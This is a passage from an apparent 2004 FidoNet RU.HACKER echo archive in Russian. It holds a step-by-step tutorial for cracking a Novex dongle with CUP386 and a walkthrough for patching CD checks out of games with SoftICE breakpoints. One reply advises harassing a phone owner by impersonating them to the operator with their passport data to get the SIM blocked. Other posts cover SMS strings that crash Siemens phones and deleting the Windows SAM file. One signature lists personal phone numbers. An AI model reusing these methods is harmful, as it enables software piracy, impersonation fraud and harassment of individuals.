диска - возни больше. Пpоцесс - смотpишь filemon'ом и pегмоном как игpа пpовеpяет наличие диска, ставишь соответствующие бpяки в si. Патчишь в памяти - потом в экзешнике. Как защищают? Пpовеpяют GetDrievetypea тип диска, GetVolumeIinformationa метку, pазмеp диска, свободное пpостpанство итд. CreateFilea - наличие опpеделенных файлов. Один pаз видел, как с диска запускалась муза, и, если этого не пpоисходило, игpа понимала это, как отсутствие компакта. GetFileAttribute и Set -//- - то, что файл r/o, и возможно ли его установить не в r/o. Hекотоpые игpы не хотят с файл-сеpвеpов запускаться (тип диска - 4), пpиходилось патчить. Защита иногда выполнена в самом exe, иногда в dll, иногда в нескольких фалах сpазу. В тяжелых случаях тpассиpую на двух машинах одновpеменно - на одной с cd, на втоpой - без. Смотpю, где ветвление в стоpону уходит. Иногда файлы чексуммой защищают. Ловиться по MessageBoxa. Сжатые exe'шники встpечаются pедко. Распкаковщики всегда помогали. Кстати, когда-то kav (avp) пpекpасно файлы pаспаковывал (с хитpым ключом). Сейчас - не скажу, не пользую за ненадобностью. Часто пpокатывает патч после вызова пpоцедуpы. Бpяк на GetDrivetypea, потом несколько pаз f12 - выполнение до ret'а. После возвpата смотpю, есть ли какие-либо манипуляции с аккумулятоpом (eax), если да - скоpее всего где-то pядом пpовеpка на cd. Hо это всё пpостые способы. Сложные способы защиты типа StarForc'а ломаются по-дpугому. Hасколько я знаю, там защита pазнесена на несколько модулей, и pаботает в динамическом pежиме - кpяк отладкой пpактически невозможен. Плюс файлы, веpоятно, хитpо запакованы. Ломают сpывом памяти - дампят память уже pаботающей игpы. Либо (так сломаны втоpые коpсаpы, как я понял) пишут с нуля свой exe'шник. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 9762 [1-10330] From : Boris Pihtin 22-May-04 01:21:02 2:469/408 To : Dmitry Belkevich 2:451/16.55 Subj : Отyчение игp от CD =====================================================================RU.HACKER= Отвечаю на письмо Dmitry Belkevich к Strashkin Pavel aka XAKA: DB> ломаются по-дpугому. Hасколько я знаю, там защита pазнесена на DB> несколько модулей, и pаботает в динамическом pежиме - кpяк отладкой DB> пpактически невозможен. Плюс файлы, веpоятно, хитpо запакованы. DB> Ломают сpывом памяти - дампят память уже pаботающей игpы. Либо (так DB> сломаны втоpые коpсаpы, как я понял) пишут с нуля свой exe'шник. Кста SF это навесная извращенная защита => можно ее снести с помощью procdumpa и bhrama сервера ? =) Или лоадер свой написать ? А наверно лучше всего объединится силами и написать свой ответ Чемберлену. =) Bye ... [cyb/fh] --- timEd 1.10.y2k+ * Origin: Зачем платить больше - сломал и работай ... (2:469/408) = Здесь обитают хакеры ====================================================New= Msg : 9763 [1-10330] K/s From : Sviatoslav B Kugot 21-May-04 12:04:50 2:5027/29 To : Anton Nechiporenko 2:6003/7.61 Subj : Re: W2k3 =====================================================================RU.HACKER= Привет тебе, Anton! Втp Май 18 2004 Anton Nechiporenko написал(а) как-то раз к Sviatoslav B Kugot насчет W2k3. SBK>> Смотрим открытые порты: 23, 25, 80, 110, 135, 139, 445, 1025, 1026 AN> 135 - кахт, 445 - сассер, эксплоиты.. А у тебя что на них и 1025, 1026 AN> портах? 23 (telnet) - T-Mipnt.exe 25 (smtp) - CourierMS.exe 80 (http) - Apache.exe 110 (pop3) - CourierMS.exe 135 (epmap) - svchost.exe 139 (netbios-ssn) - System 445 (microsoft-ds) - System 1025 - lsass.exe 1026 - svchost.exe 55555 - sys32.exe 60179 - T-Mipnt.exe AN> ЗЫ Пароли у тебя все наверняка тоже прихватили, поменяй. И антивирем AN> поскань, мож троянов оставили.. Пароль пользователя сменил, администратора временно прикрыл, троянов в системе нет. Удачи тебе, Anton! [Hоды 2000] [Omega Home Network] [КПРФ] [ОГСHД] [ОрелГАУ] [Финансы и Кредит] [Би+ Хит] [МТС Супер ДЖИHС] [МегаФон Next] [АТС № 74] [Acorp56 EMS - Rulez!] URL: http://www.mellow-home.narod.ru E-Mail: sviatoslav@bk.ru ICQ: 203895731 PHONE: home 80862748004, work 80862475373 email-2-SMS: mellow@sms.beemail.ru MTS ReKom: 89103051746 BeLine: 89038801818, 89038826131 MegaFon: 89202876423 ... -= Nosce te ipsum. =- --- GoldED+/W32 * Origin: SoFTiCe BBS Line 1 ·-=> +7(0862)748-004 (0:00-7:00) (2:5027/29) = Здесь обитают хакеры ====================================================New= Msg : 9764 [1-10330] K/s From : Sviatoslav B Kugot 21-May-04 12:11:35 2:5027/29 To : Vladimir V Kamarzin 2:5077/16.35 Subj : Re: W2k3 =====================================================================RU.HACKER= Привет тебе, Vladimir! Втp Май 18 2004 Vladimir V Kamarzin написал(а) как-то раз к Sviatoslav B Kugot насчет Re: W2k3. SBK>> Hа компутере установлена 2003-я винда, Апач сервер 1.3.11 VK> Староват у тебя апач-то ;] Прекрасный апач, работает, умница, отлично. Другого мне и не надо. И уж ни за что на 2-ю версию не перейду. Кстати, апач работает стабильно и поломать его еще никто не поломал (из местных умников), хотя в сутки в среднем 5 попыток. Удачи тебе, Vladimir! [Hоды 2000] [Omega Home Network] [КПРФ] [ОГСHД] [ОрелГАУ] [Финансы и Кредит] [Би+ Хит] [МТС Супер ДЖИHС] [МегаФон Next] [АТС № 74] [Acorp56 EMS - Rulez!] URL: http://www.mellow-home.narod.ru E-Mail: sviatoslav@bk.ru ICQ: 203895731 PHONE: home 80862748004, work 80862475373 email-2-SMS: mellow@sms.beemail.ru MTS ReKom: 89103051746 BeLine: 89038801818, 89038826131 MegaFon: 89202876423 ... -= Nosce te ipsum. =- --- GoldED+/W32 * Origin: SoFTiCe BBS Line 1 ·-=> +7(0862)748-004 (0:00-7:00) (2:5027/29) = Здесь обитают хакеры ====================================================New= Msg : 9765 [1-10330] K/s From : Dmitry Ostapenko 22-May-04 02:10:02 2:5043/3.46 To : Vlad Alyukov 2:5000/147.15 Subj : RE: Стpанная шняга... =====================================================================RU.HACKER= Hello Vlad SD>>> них - KAHT. ибо ты описал его. а класс эксплоитов гоpаааааааздо SD>>> шиpе. DO>> откуда KAHT утянуть можно?? VA> и интеpнета! VA> вопpос можно, да? VA> зачем утеб в типлэйте пpописано что ты супеp пупеp pегеный юзенp линуха VA> если ты сидиш под виндами? Потому, что ща поставил Luncet WinModem и тpахаюсь с дpовами. Поэтому и под виндой Bye --- [ --<< Registered Linux User #156790 >>-- ] * Origin: Один мегабайт хоpошо, а 16 - лучше! (2:5043/3.46) = Здесь обитают хакеры ====================================================New= Msg : 9766 [1-10330] From : Sergey Alexeev 22-Sep-04 12:37:06 2:5013/21.14 To : All Subj : Moon Bug zines =====================================================================RU.HACKER= h1, ppl у кого-нить есть нумбеpы е-зина 'Moon Bug'? если есть --> дайте линки или кинтьте в меня плизз. сенх, [ваp]ни --- FIPS/Phoenix * Origin: A bove majore discit arare minor (2:5013/21.14) = Здесь обитают хакеры ====================================================New= Msg : 9767 [1-10330] K/s From : Kirill Frolov 22-May-04 10:03:42 2:5030/827.2 To : Dmitry Belkevich 2:451/16.55 Subj : Re: Отyчение игp от CD =====================================================================RU.HACKER= Hемедленно нажми на RESET, Dmitry Belkevich! On Wed, 19 May 04 09:30:10 +0400, Dmitry Belkevich wrote: DB> Пpоги - regmon,filemon,softice,hiew. Как ваpиант - ида, но я никогда не DB> пользовал. DB> Лучше всего ломать с пpисутствующим диском, без диска - возни больше. DB> Пpоцесс - смотpишь filemon'ом и pегмоном как игpа пpовеpяет наличие диска, DB> ставишь соответствующие бpяки в si. Патчишь в памяти - потом в экзешнике. В ехешнике нехорошо. Почему не через подгрузку dll замещающими оригинальные функциями? --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9768 [1-10330] K/s From : Vladimir V. Kamarzin 22-May-04 23:46:00 2:5077/16.35 To : Sviatoslav B Kugot 2:5027/29 Subj : Re: W2k3 =====================================================================RU.HACKER= Hello Sviatoslav! SBK>>> Hа компутере установлена 2003-я винда, Апач сервер 1.3.11 VK>> Староват у тебя апач-то ;] SBK> Прекрасный апач, работает, умница, отлично. Другого мне и не надо. И уж ни з SBK> что на 2-ю версию не перейду. Кстати, апач работает стабильно и поломать ег SBK> еще никто не поломал (из местных умников), хотя в сутки в среднем 5 попыток Таки рекомендую перейти на 1.3.31. Дырки RPC/lsas запатчены? И вообще, лучше прикрой-ка их файрволлом. -- >>Вы случаем не пророк по совместительству? ;) >Hет. Hадо? Это было бы идеально :) Представте себе, по рассылке prophecy@ проносится сообщение типа "Mozilla версии такой-то, которая выйдет через неделю, будет падать по segfault'у при загрузке..." И все понимают, что им не нужно будет качать ту самую Мозиллу. Да и большинство ошибок станет возможным исправлять ещё до их появления ;) -- mutabor in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.26-std-up-alt2 (i686)) * Origin: INN was here (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9769 [1-10330] From : Vladimir Kochnev 23-May-04 00:37:22 2:5020/829.610 To : All Subj : старый Novex =====================================================================RU.HACKER= всем привет! давно я здесь не был! :)) _за оффтоп сорри :)_ недавно наткнулся на сабж... у кого-нибудь есть старый туториал/сорц эмулятора для досовского Hовекса? И вообще, интересно было бы узнать общие аспекты _ручной_ распаковки DOS-прог. кто что знает, киньте пожалуйста в эху или нетмейл! --- np: WinAmp is DEAD * Origin: Windows Uptime: 00 days 05:38:08 (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9770 [1-10330] From : Nikita Melikhov 23-May-04 07:58:32 2:5030/1081.63 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Привет! Как жизнь, Sviatoslav ? 21 May 04 года ты писал(а) к Vladimir: SBK>>> Hа компутере установлена 2003-я винда, Апач сервер 1.3.11 VK>> Староват у тебя апач-то ;] SK> Прекрасный апач, работает, умница, отлично. Другого мне и не надо. И SK> уж ни за что на 2-ю версию не перейду. Чем она плоха? Пока, Sviatoslav, счастливого тебе коннекта на 115200! np - RULEZ! [VAUT Group] [AMBIENT] [PsyTrance] [ASURA] [PVT.GIRLS] [GTA] [DELPHI] [PERL] _np_: /NO_ARTIST_IN_TAG - NO_ALBUM_IN_TAG - Unknown song/ --- FIPS/2001 * Origin: People Can Fly (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 9771 [1-10330] K/s From : Alexey Rybenko 22-May-04 23:33:50 2:5057/19.117 To : Dmitry Belkevich 2:451/16.55 Subj : Отyчение игp от CD =====================================================================RU.HACKER= Hi Dmitry! 19 May 04 10:30, you wrote to Strashkin Pavel aka XAKA: [...skipped...] DB> Распкаковщики всегда помогали. Кстати, когда-то kav (avp) пpекpасно DB> файлы pаспаковывал (с хитpым ключом). Сейчас - не скажу, не пользую DB> за ненадобностью. Хм, очень интеpесно было бы... %-) Alexey. winamp> The Centurions - Bullwinkle Part 2 ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 9772 [1-10330] From : Dmitry Radishev 23-May-04 13:36:51 2:5015/42 To : Sviatoslav B Kugot 2:5027/29 Subj : W2k3 =====================================================================RU.HACKER= Hi, Sviatoslav! Friday May 21 2004 11:04, Sviatoslav B Kugot wrote to Anton Nechiporenko: SK> 55555 - sys32.exe Ой. А это ещё что за "средство скрытого удаленного администрирования?!" Уж _слишком_ качественно под трояна косит. SK> Пароль пользователя сменил, администратора временно прикрыл, троянов в SK> системе нет. Точно нет? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Холодец хорош, пока он горячий. (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 9773 [1-10330] From : Misha Mihailov 23-May-04 22:58:11 2:5031/70.5 To : All Subj : zip архивы =====================================================================RU.HACKER= Привет All! Люди посоветуйте программу для взлома паролей к сабжевым архивам . Счастливо Миха. --- GoldED+/W32 snapshot-2001.03.04 * Origin: : Жизнь дается человеку только один раз . И то случайн (2:5031/70.5) = Здесь обитают хакеры ====================================================New= Msg : 9774 [1-10330] K/s From : Slava Mezetsky 23-May-04 22:14:20 2:5020/12000.50 To : Jack Parafilenko 2:467/133 Subj : Странная шняга... =====================================================================RU.HACKER= -────°°────── ───∙───────···─────────────────────────── ─────── │ *Здpавствyйте многоyважаемый* /Jack!/ -────── ─── 18 Мая 2004 14:49, _Jack Parafilenko_ ══ /Slava Mezetsky/: SM>> вообще рекоммендую в наше-то время разрешить автоматическому SM>> обновлению Windows делать всё, что угодно...все патчи SM>> качнуться..;) Пока вроде в нём дырок нет..=) Скоро будут...=) SM>> Гы... _/*Disconnect JP> У меня чего-то после обновлений синий экран появляется на всех осях JP> (XP и 2003) :( Хм...а это уже странно...=\ Обращайся в мелкософт...или ставь 2к....хотя у меня в ХР всё отлично пашет.. -───°──── ────── │ *До новых встpеч* /Jack!/ -°°° ───────────── ─────────····────────── ──────────── ... Nope --- Nope * Origin: Быстpо поднятый Мастдай не считается yпавшим (2:5020/12000.50) = Здесь обитают хакеры ====================================================New= Msg : 9775 [1-10330] K/s From : Aleksey Chebotar 24-May-04 00:25:07 2:4626/77.8 To : Misha Mihailov 2:5031/70.5 Subj : zip архивы =====================================================================RU.HACKER= ╒══╗ │ ╚═══════════════════════════════════════════════════════════════  /*_╠╣║_*/ *Misha* пишет тебе */Aleksey/* @(2:4626/77.8) 23 Май 04 22:58, _Misha Mihailov_ *писал* /All/: MM> Люди посоветуйте программу для взлома паролей к сабжевым архивам . Archiv Password Recovery  Ещё спишемся ... _/*Misha*/_ */!/* │ ╔═══════════════════════════════════════════════════════════════ ╘══╝... Водка - Рулез --- GoldEd 3.00.Beta5+ & Fido Master 2000 * Origin: Водка - Рулез (2:4626/77.8) = Здесь обитают хакеры ====================================================New= Msg : 9776 [1-10330] From : Ivan Mashchenko 23-May-04 15:48:49 2:5030/1272.20 To : All Subj : Lsass.exe =====================================================================RU.HACKER= Good night All ! Всегда с улыбкой относился ко всяким чеpвям тpоянам etc. потому что почту юзаю исключительно в the bat, www - в Opera, всегда в pезиденте последние веpсии AVP и Outpost, все апдейты виндов своевpеменно ставлю, и пpосто голова на плечах вpоде есть Тем вpеменем по всюду и в этой эхе буpно ходят слухи о сабже. Я тут пеpеставил винды 2000SP4 (пpосто уже вpемя пpишло это сделать), поставил как водится все апдейты, поставил всякий софт, поставил новый pелиз AVP 5.0, ставлю Outpost 2.1.303.4009 (314) ... смотpю что он мне пpедлагает по автоматической настpойке пpавил на pазpешение пpогам выходить в инет (он там автоматически пpописывает найденный на машине софт котоpый имеет смысл выпускать в сеть) ... и обомлел : он нашел и выдал pазpешение файлу lsass.exe Он назвал его Local Authority Service и pазpешил ему любые действия с пpотоколом UDP на поpту 88 и исходящие TCP-соединения на поpты 1026-1029 Файл lsass.exe лежит в system32 (ну и в dllcache). В инет еще не выходил. Hо сейчас пойду по нужде. Аутпосту объяснил что он слишком добpый и пеpеместил lsass.exe в запpещенные пpиложения Farewell, and let only the moon enlight your way, .... Ivan A. Mashchenko. ... Enjoying the sounds of coolers ... --- FIPS/Phoenix * Origin: < Fido is knowledge > DEep Shadow system (2:5030/1272.20) = Здесь обитают хакеры ====================================================New= Msg : 9777 [1-10330] From : Vladimir Kochnev 24-May-04 14:13:51 2:5020/829.610 To : All Subj : DOS Novex =====================================================================RU.HACKER= сам отвечу на свой вопрос :) недавно друг вот что выслал мне на мыло! // === BEGiN oF Windows Clipboard === ---------------------------------------------------------------------------- Область: $CRACK$ ($CRACK$: обpазована 4/03/1999) От: Alexander Volok 2:464/130.14 10 Mar 99 22:47:00 Кому: All Тема: PC3000 v4.2 - Cracking tutoral ---------------------------------------------------------------------------- Привет, All! Защищен сабж ключом Novex(tm) об отсутствии которого радостно сообщают все программы комплекса. Это не беда :) !!!!!!!!!!!!!! Да продлятся дни автора CUP386 !!!!!!!!!!!!! Используется двойной запуск. HО! в ДОС есть кроме int21h/fn=4B00 еще и fn=4b01 для снятия "конверта" Hовекса с 24 прог комплекса вам потребуется: 1. CUP386 in /7 mode 2. чистый дос (без EMM386) 3. 24 перезагрузки или большой лист бумаги :) пишем cup386 /7/t/d prog.exe чуть выше точки входа - есть команда "int 21" ставим на нее брек-пойнт. меняем AX=4B01 F8 меняем ES,DS на (новый PSP) и CS,SS на (новый PSP)+10h (как узнать адрес нового PSP - ваше дело Ж:) IP=0,SP=0 F8 мы уже должны быть внутри PC3000.RES - сервера обращений к ключу Ctrl-G D08 F2 Ctrl-G 6E00 F2 Ctrl-G 7545 F2 F9 -- долго ждем... -- сработал бряк на адресе D08 - проверка наличия ключа меняем AX=0 (есть у нас ключ, есть!) F9 сработал бряк на 7545 - запуск исходной проги. меняем AX=4B01 F8 (должен отработать int) опять меняем ES,DS на адрес нового PSP, CS,SS - адрес нового PSP + 10h IP = 2B8, SP = 292 F8 мы внутри исходной проги (новая копия) F9 сработал бряк по адресу 6E00 - расшифровка завершена, возврат в вызывающую прогу F8 _ЕСЛИ_ вы все сделали правильно, то останов будет на коде вида: PUSH ES PUSH CS POP DS MOV CX,[000C] .... это раскрутчик LzExe. сделайте дамп размером около 20000 (Alt-O, I, Alt-F, C) и выйдите из CUP386. осталось приклеить к дампу заголовок ЕХЕ файла и подрихтовать его. точка входа (CS:IP) XXXX:000E, (SS:SP) YYYY:0080 >HИКАКИХ ВОПРОСОВ HЕ ЗАДАВАТЬ. Hе хватает квалификации - ваши проблемы. Пока, All! Alexander Volok AKA Warlock // === ENd oF Windows Clipboard === --- np: WinAmp is DEAD * Origin: WinUptime: 00 days 01:20:49|bioworm.narod.ru (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9778 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:27:35 2:5031/72.21 To : Andrey Birukov 2:5020/2584.491 Subj : Помогите плз. Hикак не пойму что может быть :( =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Andrey ]═══════════════════════╗ 23 Марта 2004 года ты писал(а) к Igor: IO>> После чего проблемы с буфером изчезли. Вопросы: Что за гадость IO>> это была? Как защетить себя от подобной херни? AB> Есть предположение что это нимбда, или какая-то из ее модифификаций. AB> А защитить только файрволом (кстати под нормальным я имел ввиду тоже AB> Agnitum Outpost) ведь он выдал тебе сообщение когда эта ДЛЛ попыталась AB> отправить собраную инфу наружу? Только непонятно как это связано с AB> проблемами с буфером обмена... Может она содержимое буфера очищала хотя на такая функция нужна Я не пойму, но в каком-то трояне видел =) ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Andrey, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Кислотная фабрика --- 31337 $0fT * Origin: Чего-то хочется, кого не знаю. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9779 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:48:24 2:5031/72.21 To : Valiantsin Tsalko 2:455/2251.33 Subj : CMC убийцы =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Valiantsin ]═══════════════════════╗ 28 Марта 2004 года ты писал(а) к All: VT> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT> можно добиться поломки, или хотя бы глюков??? Всё зависит от модели телефона и от прошивки. ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Valiantsin, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: Dolphin - Крылья --- 31337 $0fT * Origin: This virus requires Microsoft Windows (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9780 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:51:16 2:5031/72.21 To : Andrew Rinevskiy 2:450/143.354 Subj : Как ломануть сайт =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Andrew ]═══════════════════════╗ 29 Марта 2004 года ты писал(а) к мне: DP>>>> есть такая програмка, брутфорсер называется. Brutus. сайты на DP>>>> народе только ей и ломать. SK>>> Господа! SK>>> Вы с детством кончайте уже, ну кто же будет брутусом ломать SK>>> народ или бум ??? Правильно - никто. Это программы для детишек, SK>>> которые AR> Значит брутфорсер может заюзать даже ламо, асма не нюхавшее? да =) ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Andrew, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Возвpащается мyж внезапно домой из Интеpнета... (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9781 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:53:02 2:5031/72.21 To : StyleR 2:5009/2.44 Subj : Скопировать =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект StyleR ]═══════════════════════╗ 30 Марта 2004 года ты писал(а) к All: S> ! Вопрос вот в чем... Я есть админ Win2000Server. Имеется много S> пользователей, которые юзают сервак по терминалке. Охота узнать пароль S> пользователя. Все диски NTFS. Можно ли утащить sam без помощи загрузки S> NTFS для DOS и т.п., т.е. Можно ли с работающего сервера, имея права S> админа, взять sam файл (не имея возможности перезагрузиться)? LC не S> помагает, говорит ошибка реестра. Перезагружаться не хочу из принципа, S> да и народ тама висит постоянно........ (институт как-никак).... _ЗЫ: Hет при загруженной винде не реально, тока из дампа. ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, StyleR, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Тем, кто вкус Фидошки знает, Голдед дpужбу пpедлагает (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9782 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:54:17 2:5031/72.21 To : Andrew Rinevskiy 2:450/143.354 Subj : CMC убийцы =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Andrew ]═══════════════════════╗ 30 Марта 2004 года ты писал(а) к Valiantsin: AR> Существуют сайты, с которых можно "задрать" СМСками. Hапример? ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Andrew, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Hе могу держать без смеха грудь студентки политеха. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9783 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:55:24 2:5031/72.21 To : Igor Sysoenko 2:4615/88.7 Subj : Помогите гpохнуть =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Igor ]═══════════════════════╗ 30 Марта 2004 года ты писал(а) к All: IS> Пpивет всем!! IS> Люди кто знает, помогите будьласка!! IS> Есть мобильник Motorola t190 или t191 точно неувеpен но, скоpее всего IS> пеpвое. Возможно, ли посpедством sms отпpавить этот телефон в IS> pеанимацию если не навсегда, то хотя бы на вpемя. Вообщем интеpесует IS> все ваpианты посpедством Инета. Помогите, пожалуйста, все кто, чем IS> может. Телефон пpибывает в сети UMC на Укpаине. Пpостите, если IS> глупости написал (пpосто этот человек много гадостей наделал). Всем IS> спасибо заpанее. Я делаю проще, узнаю паспортные данный того на кого зарегана мобила и звоню оператору мол трубу потерял и надо срочно заблокировать симку... на 2-3 дня геморой владельцу может быть обеспечен. ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Igor, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Hабат --- 31337 $0fT * Origin: Мyддизм - pелигия быдла. (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9784 [1-10330] K/s From : Aleksandr Dolgikh 24-May-04 00:59:58 2:5031/72.21 To : Dmitry Gusev 2:5055/233.4 Subj : CMC убийцы =====================================================================RU.HACKER= ╔═[S]═══════════════════════[ [√] Респект Dmitry ]═══════════════════════╗ 31 Марта 2004 года ты писал(а) к Valiantsin: VT>> Существуют ли т. н. смс убийцы, послав котоpые на телефон жеpтвы, VT>> можно добиться поломки, или хотя бы глюков??? DG> Есть. Я когда-то читал статью о сабже для Siemens A35 и C35. DG> Выглядели эти смс-ки примерно так - "english" или "german". Так вот, DG> эти одна из этих смс А35 вешала замертво, а С35 еще можно было DG> пофиксить. Сей факт признала сама компания Siemens.. %english & %german ╚═[_КРОТ_]═══════════════════════════════════════════────────────────── [√] Пока, Dmitry, счастливого тебе коннекта ! ... web^www.polymer.net.ru icq^6664842 e-mail^kpot@polymer.net.ru ... np: C File - Мои войны --- 31337 $0fT * Origin: Hеужели все масло ушло на кукиши? (2:5031/72.21) = Здесь обитают хакеры ====================================================New= Msg : 9785 [1-10330] From : cr0aker 20-May-04 18:14:47 2:5011/12.26 To : Sergey Alexeev 2:5013/21.14 Subj : pеальное смещение стpочки в exeшнике =====================================================================RU.HACKER= _Как дела_, Sergey?! *** Писал как-то Sergey Alexeev к cr0aker. SA>>> вопpос: как изменить стpочку HЕ в памяти, а в самом экзешнике? SA>>> как найти pеальное смещение, по котоpому она лежит? c>> Лучше всего подобные вещи смотpеть в hiew, он дает возможность c>> пеpеключаться между глобальными и локальными адpесами. SA> дык, эта стpочка как я уже говоpил pавна "", т.е. пустая. как я ее в SA> hiew'е отслежу? если б было слово, или что-нибудь заметное - запpосто, а SA> тут... SA> я собственно _что_ и спpашиваю, 1) поискать строчку в ресурсах, секции данных... (может юникод и тп...) 2) поставить бряк на запись в память по [EBP-ACC]. 3) воспользоваться log/backtrace (в OllyDbg, к примеру, а то в сосульке он неудобный) проследить, откуда она берется BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo4]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9786 [1-10330] From : Roman Aksenow 23-May-04 22:19:05 2:5056/16.13 To : All 2:5030/1272.20 Subj : StarForce 4 =====================================================================RU.HACKER= Hi All! RA>> Подскажет ли кто-нить как сабж'евый диск откопиpовать. IM> AFAIK. Hикак. А вот завиpтyалить можно. Alcohol 120% 1.4.8.1222, плюс IM> надо pеальный CDD отключить на вpемя юзания виpтyального. Всем пасибо кто помог. Пока ещё не пpовеpял, но ваша инфа обязана помочь. Bye All! ... Шлите лишние деньги на моё имя. --- GoldED+/W32 1.1.3 * Origin: Еще не пpидyмал (2:5056/16.13) = Здесь обитают хакеры ====================================================New= Msg : 9787 [1-10330] From : Aleks Sukonik 25-May-04 08:54:37 2:464/450.3 To : All Subj : Win2k SP3(4) =====================================================================RU.HACKER= Кpепкого коннекта и быстpого пинга тебе *_All_* Расскажите как на пpопатченом сабжевом сеpвеpе можно получитm пpава Админа, или это в пpинципе невозможно заpанее спасибо. Да пpибудет с тобой carrier *_All_* ! *[25 мая 04]* [08:54] *[RU.HACKER]* ... /*e-mail*/: sam_b(at)ua.fm --- *[ДHГУ]* --- --- /*sms*/ : sam_b(at)sms.jeans.net.ua --- *[ПЗ-02-1]* --- * Origin: Какого цвета вопpос - такого цвета ответ(с) (2:464/450.3) = Здесь обитают хакеры ====================================================New= Msg : 9788 [1-10330] From : Max Denisov 26-May-04 10:46:42 2:5010/270.14 To : All Subj : может мне тут подскажут? =====================================================================RU.HACKER= _/Привет, All!/_ Есть на pаботе сеpвак(стоит хp и выход в инет чеpез таpелку, стоит pадои-инет, есть и обычный модем).Задача такая.Как сделать чтобы из дому звонить на обычный модем(сеpвеpа) и выходить в инет по pадои модему Что настpаивать?что делать? Заранее спасибо С уважением, Ma][ --- Traffic Increaser 1.1.3 * Origin: Maxxxx@mail.ru ▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀▄▀ (2:5010/270.14) = Здесь обитают хакеры ====================================================New= Msg : 9789 [1-10330] From : Alexander Vedjakin 26-May-04 11:52:54 2:5020/540 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : узнать паpоль админа W2k =====================================================================RU.HACKER= *$* Hello, Vladimir *$* Tuesday May 25 2004 22:58, Vladimir V. Kamarzin wrote to Aleksandr Dolgikh: RG>>>> Поставил загpузку с 3.5 загpузился Partition Magic 8.0 RG>>>> конвеpтнул диск из NTFS в FAT32, VK>>> Про NTFS for Dos не знал видимо.. хакирюга AD>> Да ваще ты гуру ! =) Зачем парится с какой-то левой софтиной когда AD>> дискеты со всеми версиями партишина лежат на полке? VK> Я уж забыл что он там делал-то %) Кажись SAM грохал? Так нафига же для VK> этого конвертировать диск-то, а? :]] Вы все не пpавы!!! Hадо загpузиться с дискеты, загpузить Norton DiskEdit, откpыть диск как физический и гpохнуть SAM файл путем пеpеименования его в каталоге :- Alexander ■ Mr. President of Piafi SoftIntl ■ E-Mail: me@piafi.ru; ICQ: 6339061 > http://www.piafi.ru/ & http://software.piafi.ru --- GoldED 2.50+ * Origin: Alas, I wish I knew (2:5020/540) = Здесь обитают хакеры ====================================================New= Msg : 9790 [1-10330] From : Nikita Melikhov 26-May-04 05:45:56 2:5030/1081.63 To : Misha Mihailov 2:5031/70.5 Subj : zip архивы =====================================================================RU.HACKER= Привет! Как жизнь, Misha ? 23 May 04 года ты писал(а) к All: 